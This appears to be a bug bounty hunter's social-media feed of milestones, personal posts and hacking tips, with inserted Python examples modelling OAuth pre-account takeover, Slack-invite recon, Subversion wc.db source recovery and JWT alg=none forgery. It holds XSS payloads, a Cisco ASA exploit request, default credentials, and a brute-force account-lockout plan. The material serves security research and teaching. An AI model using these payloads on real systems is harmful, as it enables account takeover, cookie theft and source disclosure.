RCE on main website via Okta Log4j?!
O Generous One (Ya Kareem)! ~ dependency confusion (package hidden in a JS file). Published it, reported it, and got a callback after 1 week. Allah Kareem.
A few years ago, I dreamed of finding bugs in top-tier targets like Google. Last week, I finally got my first confirmed report from @googlevrp. Alhamdulillah ❤️
Alhamdulillah, I earned a bounty for my submission on @bugcrowd bugcrowd.com/sl4x0 #ittakesacrowd Just got the biggest bounty of my life! This is a huge milestone in my journey.
I've successfully uncovered the trendy XSS vulnerability [CVE-2023-29489] on a high-profile target :D
The website gives me the ability to create a custom page with a unique URL. The custom page requires inputs for the page title and description. I simply input my payload, save it, then visit the page, and voila! 🔥 script><svg/onload=prompt`{document.cookie}`> #bugbountytips
Another hit of today is CVE-2020-3580, which is an unauthenticated POST-based XSS in Cisco Adaptive Security Appliance!
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: example.tld

SAMLResponse="><svg/onload=alert('SL4X0')>
#bugbountytips #bughunting #cve
Tal is the weekend's P1 warrior 🫶🏻
2025's first blood 🏴‍☠️
Excited to share that I've made it to the top 3 🥉 on @Bugcrowd's March leaderboard! What a fantastic month it's been! Grateful for this achievement, Alhamdulillah.
🔥 A new hit on the same target:
- Victim signs up but the website doesn't send a confirmation mail.
- Attacker logs in via Facebook, unchecks the email scope.
- Site asks for an email, attacker enters the victim's.
- Site sends the confirmation to the victim.
- Victim clicks, attacker now owns the account.
just bagged my first oauth bug! After grinding and reading up for days, I stumbled on this write-up, applied it, instantly found a bug: muhammad-aamir.medium.com/oa…
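The flow in the post above, modelled as an added example (my code, not the target's): an in-memory site where the victim's signup is never confirmed, and an OAuth login whose provider withheld the email scope. The names (`Site`, `User`, `oauth_login_vulnerable`, the `fb:attacker` identity) are assumptions. The vulnerable path ties the attacker's OAuth identity to whatever address the attacker typed and merges it into the existing account as soon as anyone clicks the confirmation link; the hardened path never lets a client-supplied email attach to an existing account and requires a password login before linking a provider-verified one.

```python
"""Pre-account-takeover through OAuth with an unverified email: vulnerable vs hardened linking."""
from dataclasses import dataclass, field
from typing import Dict, Optional, Set, Tuple
import secrets


@dataclass
class User:
    email: str
    password: Optional[str] = None
    email_verified: bool = False
    oauth_ids: Set[str] = field(default_factory=set)


class Site:
    def __init__(self) -> None:
        self.users: Dict[str, User] = {}                              # email -> account
        self.confirm_tokens: Dict[str, Tuple[str, Optional[str]]] = {}  # token -> (email, pending oauth id)

    def signup(self, email: str, password: str) -> None:
        # Victim registers; the site never sends the confirmation mail (as in the post).
        self.users[email] = User(email=email, password=password)

    # ---- vulnerable behaviour ----------------------------------------------------
    def oauth_login_vulnerable(self, oauth_id: str, provider_email: Optional[str],
                               typed_email: Optional[str] = None) -> str:
        """Provider gave no email, so the site asks the client for one and mails a link.
        The token carries the attacker's oauth_id; whoever clicks completes the merge."""
        email = provider_email or typed_email
        if email is None:
            raise ValueError("no email available")
        token = secrets.token_urlsafe(16)
        self.confirm_tokens[token] = (email, oauth_id)
        return token  # delivered to `email`, i.e. to the victim's inbox

    def confirm_vulnerable(self, token: str) -> User:
        email, oauth_id = self.confirm_tokens.pop(token)
        user = self.users.setdefault(email, User(email=email))
        user.email_verified = True
        if oauth_id:
            user.oauth_ids.add(oauth_id)  # attacker's Facebook identity now opens the victim's account
        return user

    # ---- hardened behaviour -----------------------------------------------------
    def oauth_login_hardened(self, oauth_id: str, provider_email: Optional[str],
                             typed_email: Optional[str] = None):
        """Only a provider-verified email may match an existing account, and even then
        linking needs a password login first. A client-typed email can only start a new,
        separate account; its confirmation token verifies the address and nothing else."""
        if provider_email:
            if provider_email in self.users:
                raise PermissionError("existing account: log in with password to link")
            user = self.users[provider_email] = User(email=provider_email, email_verified=True)
            user.oauth_ids.add(oauth_id)
            return user
        if typed_email is None:
            raise ValueError("no email available")
        if typed_email in self.users:
            # Never attach a client-supplied address to someone else's account.
            raise PermissionError("email already registered: log in with password")
        user = self.users[typed_email] = User(email=typed_email)
        user.oauth_ids.add(oauth_id)
        token = secrets.token_urlsafe(16)
        self.confirm_tokens[token] = (typed_email, None)  # confirms the address only
        return token

    def confirm_hardened(self, token: str) -> User:
        email, _ = self.confirm_tokens.pop(token)
        self.users[email].email_verified = True
        return self.users[email]


def run_vulnerable() -> bool:
    """Replays the post's steps; True means the attacker's identity is on the victim's account."""
    site = Site()
    site.signup("victim@example.com", "hunter2")  # constructed victim
    token = site.oauth_login_vulnerable("fb:attacker", provider_email=None,
                                        typed_email="victim@example.com")
    site.confirm_vulnerable(token)  # victim clicks "confirm your email"
    return "fb:attacker" in site.users["victim@example.com"].oauth_ids


def run_hardened() -> bool:
    """Same steps against the hardened logic; the link attempt is refused."""
    site = Site()
    site.signup("victim@example.com", "hunter2")
    try:
        site.oauth_login_hardened("fb:attacker", provider_email=None,
                                  typed_email="victim@example.com")
    except PermissionError:
        pass
    return "fb:attacker" in site.users["victim@example.com"].oauth_ids


if __name__ == "__main__":
    print("vulnerable takeover:", run_vulnerable())
    print("hardened takeover:", run_hardened())
```

The check that matters is the one on the typed email: an address the client supplies is an untrusted claim, so it must never be used as the key for merging into an account that already exists, no matter who later clicks the confirmation link.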
Alhamdulillah, I've made it to the Top 300 all-time hackers on @Bugcrowd!
I spent a year doing full-time hunting. Here's the cold, hard, cash-only test I used to see if it was even worth it. Welcome your feedback on my blog post detailing this methodology: blog.sl4x0.xyz/posts/full-ti… #bugbounty #bugbountytips
I've been diving deep into supply chain attacks for the past month, coding and researching non-stop. It's paying off, and I'll drop my findings and tool after I wrap up scanning. (No GitHub package files scanning, BTW.)
Alhamdulillah, I hope it's not a duplicate. BTW, I used @xnl_h4ck3r's Waymore tool 🔥 #bugbounty
Alhamdulillah, just hit 1000 points on @Bugcrowd! So proud of this achievement and grateful for all the support! ✌🏻
Let's see..
Hello everyone ♥ a little write-up of #bugbountytip #bugbountytips I am going to write here.....

Title: getting unauthorized access to third-party workspaces, and building your checklist for quickly locating bugs there via massive recon.

We know that it's helpful to look for Google Groups/Docs/etc., and Slack as well, just like the amazing @h4x0r_dz shared days ago: use the Google dork "site:join.slack.com".

I was not in a good mood the last months to do Google dorks, so what I did was build a checklist ready for me, a very huge one, e.g.:
groups.google.com
docs.google.com
join.slack.com
(this is just an example; you can add more similar workspaces to your checklist)

Then I extracted all internet endpoints, for example here for join[.]slack[.]com:
otx.alienvault.com/api/v1/in…
virustotal.com/vtapi/v2/doma…
web.archive.org/cdx/search/c…
You can use the ready tools to do it, such as waymore.

Important note: you have to keep your checklist updated every week.

From here I just keep looking for the company name or domain name to see if there's anything connected; mostly the company name or domain name is in the URL itself, e.g. tesla: join.slack.com/t/Tesla-Inter…

Examples of bugs found:
1. unauthorized access to the workspaces (PII | information disclosure)
2. account takeover, e.g. a valid employee signup link
3. account takeover, e.g. a valid employee reset-password link

Now about Slack, as an example: if you found an invitation link for Tesla, join.slack.com/t/Tesla-Inter…, and that link was not valid, don't stop here; it will redirect to, e.g., tesla-internal[.]slack[.]com. Go back and start looking manually for endpoints of this subdomain as well, e.g. web.archive.org/cdx/search/c…

Now, there are a lot of third-party workspaces; I just shared Slack & Google Docs/Groups here. What I wrote is a bit long and annoying to some, so I apologize. I hope, as usual, that this will be useful to all who follow me here.
#Bugbounty don't forget to retweet if you like it ♥♥♥
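The triage step from the write-up above, as an added example (my code, not the author's tooling or waymore): take the URL list you pulled for your checklist hosts, keep the ones whose path carries the target's name, and turn every `join.slack.com/t/<workspace>/...` invite into the `<workspace>.slack.com` host the invite redirects to, so it can be fed back into the next archive lookup. The sample URLs are constructed; the checklist hosts, the "keep every hooks.slack.com hit" rule, and the `triage` function name are my assumptions, and the real input would be the `original` column of CDX output.

```python
"""Filter archived third-party-workspace URLs for a target and derive follow-up hosts."""
import re
from typing import Iterable, List, Optional, Tuple
from urllib.parse import urlsplit

# Checklist of third-party hosts worth watching (assumed; extend for your own list).
CHECKLIST_HOSTS = {
    "join.slack.com",
    "groups.google.com",
    "docs.google.com",
    "hooks.slack.com",
}

# Constructed stand-ins for the `original` field of Wayback CDX / waymore output.
SAMPLE_URLS = [
    "https://join.slack.com/t/Tesla-Internal/shared_invite/zt-abc123",
    "https://join.slack.com/t/random-hobby/shared_invite/zt-zzz",
    "https://groups.google.com/a/example.com/g/tesla-dev",
    "https://docs.google.com/document/d/1AbC/edit",
    "https://hooks.slack.com/services/T000/B000/XXXX",
    "https://example.com/about",
]


def matches_target(url: str, keywords: Iterable[str]) -> bool:
    """True when a target keyword appears anywhere in the URL (case-insensitive)."""
    u = url.lower()
    return any(k.lower() in u for k in keywords)


def slack_workspace_host(url: str) -> Optional[str]:
    """join.slack.com/t/<name>/... -> <name>.slack.com, the host an invite redirects to."""
    parts = urlsplit(url)
    if parts.netloc.lower() != "join.slack.com":
        return None
    m = re.match(r"^/t/([A-Za-z0-9][A-Za-z0-9-]*)", parts.path)
    return f"{m.group(1).lower()}.slack.com" if m else None


def triage(urls: Iterable[str], keywords: Iterable[str]) -> Tuple[List[str], List[str]]:
    """Return (hits, extra_hosts): checklist URLs tied to the target, and new hosts to recon."""
    hits: List[str] = []
    extra_hosts = set()
    for url in urls:
        host = urlsplit(url).netloc.lower()
        if host not in CHECKLIST_HOSTS:
            continue
        # Incoming-webhook URLs carry no workspace name, so a name filter would drop
        # them; keep them all, since each one is a secret on its own.
        if host != "hooks.slack.com" and not matches_target(url, keywords):
            continue
        hits.append(url)
        ws = slack_workspace_host(url)
        if ws:
            extra_hosts.add(ws)
    return hits, sorted(extra_hosts)


if __name__ == "__main__":
    hits, hosts = triage(SAMPLE_URLS, ["tesla"])
    print("\n".join(hits))
    print("re-scan these hosts:", hosts)
```

Run it over the real CDX dump for each checklist host, then loop: every host in the second list goes back into the archive query, which is the "don't stop at the dead invite link" step from the write-up.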
Congratulations to the #FreePalestine team for securing the 3rd spot at #NahamconCTF! 🇵🇸
Thanks @Bugcrowd, you just made my morning! 🦾
2024 was an amazing year for me, truly a year of Allah's plan! I actually managed to increase my bounty earnings a lot more than in 2023, landing me almost in the top 200 all-time on @bugcrowd! 😎
- Total valid reports: 289
- Critical/High reports: 52
Actively working on Bugcrowd only, with some activity on @Hacker0x01 in the last two quarters!
- I improved my skills with new attack vectors and managed to turn a profit from them this year!
- Most of my bounty came from one program, roughly one-third from it.
- I collaborated with amazing people this year.
My goal for 2025 is to delve deeper into complex attack vectors for web and mobile, aiming to climb the ranks on Bugcrowd to the top 100, while also giving more time to other platforms like HackerOne & HackenProof. #bugbounty #wrapped2024 #bugcrowd #hackerone
At least I tried to hack @Bugcrowd 👀
Top 200 on @Bugcrowd 🧡 alhamdulillah, always.
A big shoutout to the incredibly talented @sidxparab for creating this amazing cheat sheet! Thanks to this awesome resource, my automation script is now top-notch and running like a dream. Keep up the fantastic work! sidxparab.gitbook.io/subdoma… #bugbountytips #recon
I earned my first bounty $$$ for my submission on @bugcrowd bugcrowd.com/sl4x0 #ItTakesACrowd
Mind blown! 🤯 Just discovered @notebooklm - it's incredible! You can input any learning resources (books/blogs/videos/slides) about bugs or tech topics you want to study, then chat about them. It even generates podcast-style conversations between two hosts discussing the content. Game-changer for learning! 🚀 #bugbountylearn
Android App Gantix JailMonkey Root Detection Bypass using Frida! 🫡 Script: raw.githubusercontent.com/Ay… #BugBountyTips #AndroidHacking
"How a '.git' file Leads to Zendesk Panel Takeover" by Abdelrhman Allam (sl4x0) sl4x0.medium.com/how-a-git-f…
I made my mother proud of me.
I wish I could have a good night. I am sorry for you, my mother. Someday you will be proud of me.
How old were you when you realized Burp shows HTTP/2 requests in HTTP/1 format and all this time you were testing smuggling on converted traffic? Me: 😶 portswigger.net/burp/documen…
I tried with "hooks.slack.com" and found some juicy stuff, and the circle keeps going; you and your ideas, webarchive is a treasure.
Alhamdulillah ♥️. This month marks my first YEAR on @Bugcrowd, and it's been an incredible journey with the support of an amazing squad. I've focused solely on BBPs, with a few P1s still pending. Can't count everyone who helped me through this, so THANK YOU ALL!
Just dropped ghmon-cli, a powerful, zero-config GitHub/GitLab secrets scanner built for speed, signal, and automation. 🔍 TruffleHog-powered 📢 Discord/Telegram alerts 🕵️‍♂️ Continuous monitoring 🛠️ OSS. Clone it → github.com/sl4x0/ghmon #infosec #bugbounty #osint #recon
I am not sure if everyone knows this but @bugcrowd reevaluates all submissions even when closed!
Don't usually share things that aren't finalized, but let's stay motivated and get back to hacking after this exam slump #bugbountymotivation
I just submitted my first valid report to @GoogleVRP! 🐞
Fascinating comment I received a while ago, thanks @Bugcrowd for the awesome customers!
Hey everyone! If you were starting bug bounty hunting from scratch, what would you do? I need to brush up on some basics and review some attack methods. Any advice on subscriptions, general tips, books, etc..? Thanks! #bugbounty
Is that an automation bro : @RelentlessT7
3 days grinding to just see this msg. Used ChatGPT, ManusAI, and a lot of human brain debug vibes. AI + human brain = unstoppable combo Hope it boots up smooth after its nap :) Not a TruffleHog wrapper. A standalone tool that just uses truffle as a scanner.
Sending a huge thanks to @Bugcrowd for the awesome swag! 🧡
#thread #bugbountytips #googlemapapikey #recon 🧵 Found a Google Map API Key? Follow these steps with me! Google Map API Key starts with "AIzxxxxxxxxxxxxxx" Download this tool for making a clear PoC: github.com/ozguralp/gmapsapi…
Some cool BACAs to start the weekend w/ @MElguerdawi ✌🏻
My first P1 at a VDP. Wait for the reports to be disclosed so I can share some cool details :)
fastest resolution of the year!
My life's ultimate goal! O Allah, grant us the opportunity! 🤲🏻
Just scored a (my first) reward @intigriti, check my profile: app.intigriti.com/profile/sl… #HackWithIntigriti 🐝 There's always something nostalgic about landing your first bounty on a new platform, big thanks to @intigriti for the smooth triage and warm welcome.
Recently, I got positive feedback from a customer after a policy change discussion. I realized that their respect and appreciation mean more to me than the money. Thanks @Bugcrowd for bringing such great customers to us all.
Forcing account lockout after multiple wrong password attempts, requiring a password reset to regain access: a simple script running 24/7 with wrong-password login attempts can block the victim from accessing their account all the time! What do you think about severity? Yoo, #bugbounty!
> No matter how far you go in life or how much you master your field, it all ends at the same place, standing before Allah. Don't forget to prepare for that day
Thank you @Bugcrowd for this awesome gift! 🤩
I don't usually share stories, but desync attacks are trending nowadays. From day one of my security journey, I've been ambitious to learn them, but every time I tried, I failed and gave up. If you read @deadvolvo's blogs on them, I promise you'll be on your way to top-tier on them.
Have you ever heard about `wc.db` file disclosure?! > you can check it by: https://target[.]com/.svn/wc.db > then you can use this tool to dump all of the website source code: github.com/anantshri/svn-ext… #bugbountytips #information #disclosure #infosec
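What the linked tool does once it has the file, shown as an added example (my code, not svn-extractor): a Subversion working-copy `wc.db` is an SQLite database whose `NODES` table lists every versioned path with a `$sha1$<40 hex>` checksum, and the unmodified copy of each file sits under `.svn/pristine/<first two hex>/<sha1>.svn-base`, so the checksum is all you need to request the source. A real `wc.db` would be fetched from `https://target/.svn/wc.db`; here a minimal copy of the table (only the columns the code reads, with constructed rows) is built in memory so the block runs offline. `target.tld` and the helper names are placeholders.

```python
"""Map entries in an exposed Subversion wc.db to their pristine source files."""
import sqlite3
from typing import List, Optional, Tuple

PRISTINE_PREFIX = ".svn/pristine"
HEX = set("0123456789abcdef")


def build_sample_wcdb() -> sqlite3.Connection:
    """Constructed stand-in for a downloaded wc.db, limited to the NODES columns used below."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE NODES (local_relpath TEXT, kind TEXT, checksum TEXT, op_depth INTEGER)")
    db.executemany("INSERT INTO NODES VALUES (?,?,?,?)", [
        ("", "dir", None, 0),
        ("config", "dir", None, 0),
        ("config/db.php", "file", "$sha1$" + "a" * 40, 0),
        ("index.php", "file", "$sha1$" + "0123456789abcdef" * 2 + "01234567", 0),
        # op_depth > 0 is a locally scheduled change; its pristine copy still exists.
        ("old.php", "file", "$sha1$" + "f" * 40, 1),
        ("README", "file", None, 0),  # no pristine text recorded for this node
    ])
    return db


def pristine_path(checksum: Optional[str]) -> Optional[str]:
    """'$sha1$<40 hex>' -> '.svn/pristine/<xx>/<40 hex>.svn-base'; None if not a SHA-1 entry."""
    if not checksum or not checksum.startswith("$sha1$"):
        return None
    digest = checksum[len("$sha1$"):].lower()
    if len(digest) != 40 or any(c not in HEX for c in digest):
        return None
    return f"{PRISTINE_PREFIX}/{digest[:2]}/{digest}.svn-base"


def list_files(db: sqlite3.Connection) -> List[Tuple[str, str]]:
    """Return [(working-copy path, pristine path)] for every file node with a checksum."""
    rows = db.execute(
        "SELECT local_relpath, checksum FROM NODES "
        "WHERE kind = 'file' AND checksum IS NOT NULL ORDER BY local_relpath"
    ).fetchall()
    out = []
    for rel, checksum in rows:
        pristine = pristine_path(checksum)
        if pristine:
            out.append((rel, pristine))
    return out


if __name__ == "__main__":
    for rel, pristine in list_files(build_sample_wcdb()):
        # Each pristine path is what you request from the web root to recover `rel`.
        print(f"{rel}  <-  https://target.tld/{pristine}")
```

Against a live target, replace `build_sample_wcdb()` with `sqlite3.connect("wc.db")` on the downloaded file; if `.svn/wc.db` returns 404 but `.svn/entries` exists, the repository uses the older pre-1.7 layout, where the text lives under `.svn/text-base/<name>.svn-base` instead and this table does not exist.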
created a simple blog post about the bug if needed: blog.sl4x0.xyz/posts/the-oau… #bugbountytips
โžก๏ธ CVE-2020-3187 - Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal Template: github.com/projectdiscovery/โ€ฆ
The happiest surprise, by Allah ♥️
God willing, we will be recording a podcast with Eng. Ibrahim Hegazy @Zigoo0 about cybersecurity and his journey working in this field at many global companies such as Visa. If you have a question for the guest, write it in a comment and, God willing, we will cover it in the podcast.
🟢 Shopify Subdomain Takeover! - Be sure to add the word #shop to your DNS brute-force wordlist! - E.g. ➡️ shop[.]target[.]com Template: github.com/projectdiscovery/… #bugbountytips #bughunting #nuclei #infosec #takeover
this guy is absolutely killing it with how fast and smoothly he handles reports - Thanks @immunefi
Apache Karaf Web Console Default Credentials! ✅ karaf:karaf #bugbountytips #default #login #Karaf
When @Bugcrowd knows that you're facing a final exam tomorrow:
The main idea behind my new tool is to not only scan GitHub repositories but also restore all deleted commits, then scan the full repo. This approach uncovers more secrets. Read more here: medium.com/@sharon.brizinov/…
A tweet of appreciation just for the triager "Lemonade", as they served all of my Response Requests and saved my bills with 3x $$$ bounties. - Now I have a good Eid vacation 🏖️
It's been a while since I've seen this - 'triaged' evokes a reaction 🤨 #bugbountylife
🔥 New Chrome extension: BB-Reformater! Rewrite text on any webpage, directly in your browser. A must-have for bug bounty hunters needing pro reports fast. Ditch the tab-switching between ChatGPT and reports—start rewriting now! ➡️ github.com/sl4x0/bb-reformat… #bugbounty
🎉 Wrapped up 2024 with 148 vulnerability reports on @Hacker0x01! From 71 critical findings to making waves in web security - this swimming lamb is proud to help protect the digital ocean! 🐑🏊‍♂️ #HackerOne #InfoSec #BugBounty #ProudHacker hackerone.com/stories-of-202…
Alhamdulillah! Me, @Hammad7361, and @HeBo117 have qualified for Bugcrowd's #CarnivalChAIos 2024 with team HackForGod! Super grateful for this opportunity, especially since we faced some unexpected personal challenges along the way – but we made it! 🧡
Whoever Kirk is, this man instantly gave off an AURA! 🔥
This encourages me to do more! This is why I love bug bounty! Thanks @trimkadriu & @Bugcrowd! ✌🏻
We made it to the Top 8 at Carnival of ChAIos! 🎉 Huge thanks to the entire @Bugcrowd team for their incredible support throughout this journey. We learned so much from this experience and can't wait for next year! 🚀
I got swag from the Dutch Government @ncsc_nl! 😎 #HackWithNCSC
"A small token of appreciation for your well written report, but it's not actually a vulnerability!" #bugbountytrolls
Just wrapped up my education, now onto the real adventure: bug bounty hunting!
Replying to @Masonhck3571
To add an extra layer of truth to the Mason word, look at the difference between those two screenshots!
Eid Mubarak everyone! 🌙✨ May your Eid be filled with love and blessings! #EidAlFitr
Is it that time of year again?
Eid Mubarak!
JWT `none` algo + MongoDB ObjectID = full ATO 👍
Hello everyone, I am pleased to announce that I have just published an exceptional write-up on the subject of JWT and the analysis of user IDs in order to identify a successful IDOR vulnerability. medium.com/@M0X0101/how-i-wa… #bugbounty #bugbountytip #bugbountytips #infosec
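The two halves of the chain named above, as an added example (my code, not the linked write-up's): a server that trusts the token's own `alg` header accepts an unsigned `alg: none` token, so an attacker re-encodes the payload with another user's `sub` and an empty signature; and because a MongoDB ObjectID starts with a 4-byte Unix timestamp followed by a machine/process value and a counter, other users' IDs are far easier to guess than a random identifier would be. `APP_SECRET`, the claim layout, the sample ObjectID and all function names are assumptions; nothing about the real target's tokens is on the page. The hardened verifier pins the algorithm server-side instead of reading it from the token.

```python
"""JWT alg=none forgery, the vulnerable and hardened verifiers, and ObjectID timestamp extraction."""
import base64
import hashlib
import hmac
import json
from typing import Dict

APP_SECRET = b"assumed-server-secret"  # assumption: the app's HS256 key


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: Dict) -> str:
    """What the server issues at login."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    sig = hmac.new(APP_SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def forge_none(token: str, new_claims: Dict) -> str:
    """Attacker: rewrite claims (e.g. `sub` to a guessed ObjectID), set alg=none, drop the signature."""
    _, body, _ = token.split(".")
    payload = json.loads(b64url_decode(body))
    payload.update(new_claims)
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{b64url(json.dumps(payload).encode())}."


def verify_vulnerable(token: str) -> Dict:
    """Trusts the header's alg: 'none' means no signature is checked at all."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if str(header.get("alg", "")).lower() == "none":
        return json.loads(b64url_decode(body_b64))
    expected = hmac.new(APP_SECRET, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))


def verify_hardened(token: str) -> Dict:
    """Pins the algorithm server-side; the token's header may only agree with it."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("algorithm not allowed")
    expected = hmac.new(APP_SECRET, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not sig_b64 or not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))


def objectid_timestamp(oid: str) -> int:
    """The first 4 bytes of a 12-byte MongoDB ObjectID are the creation time (Unix seconds)."""
    if len(oid) != 24 or any(c not in "0123456789abcdef" for c in oid.lower()):
        raise ValueError("ObjectID is 24 hex characters")
    return int(oid[:8], 16)


if __name__ == "__main__":
    victim_oid = "5f9d88f5c3a1b2e4d6f7a8b9"  # constructed sample ObjectID
    issued = sign_hs256({"sub": "5f9d88f5c3a1b2e4d6f7a8c0", "role": "user"})
    forged = forge_none(issued, {"sub": victim_oid})
    print("vulnerable server sees sub =", verify_vulnerable(forged)["sub"])
    try:
        verify_hardened(forged)
    except ValueError as err:
        print("hardened server:", err)
    print("victim account created at", objectid_timestamp(victim_oid))
```

Rejecting `none` by name is not enough on its own: a verifier that still reads the algorithm from the header can be pushed from HS256 to RS256 or vice versa; the safe shape is the one above, where the server decides the algorithm and the header is only checked for agreement.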
If you would like to support Palestine financially, you can donate through this link (in Kuwaiti dinars): palestine2.myfatoorah.com/ks… #GazaUnderAttack #FreePalastine #طوفان_الأقصى
success in bug bounty isn't just about technical skill it's about professionalism and trust. the @Bugcrowd researcher Code of Conduct is essential reading. everything from out-of-scope testing to disclosure has clear rules. Knowing them protects your reputation and career.
Fight, even if only with words! When will Allah's help come? - Indeed, Allah's help is near. #PalestineGenocide #مستشفى_المعمداني #Gaza
O Allah, Make me strong through You, powerful in You, merciful to those You love. Grant me understanding of reality, awareness of my mission, steadfastness at my post, restraint in my speech, abundance in my deeds.
feeling scattered by too many goals and unsure where to find true success? Recommend reading this!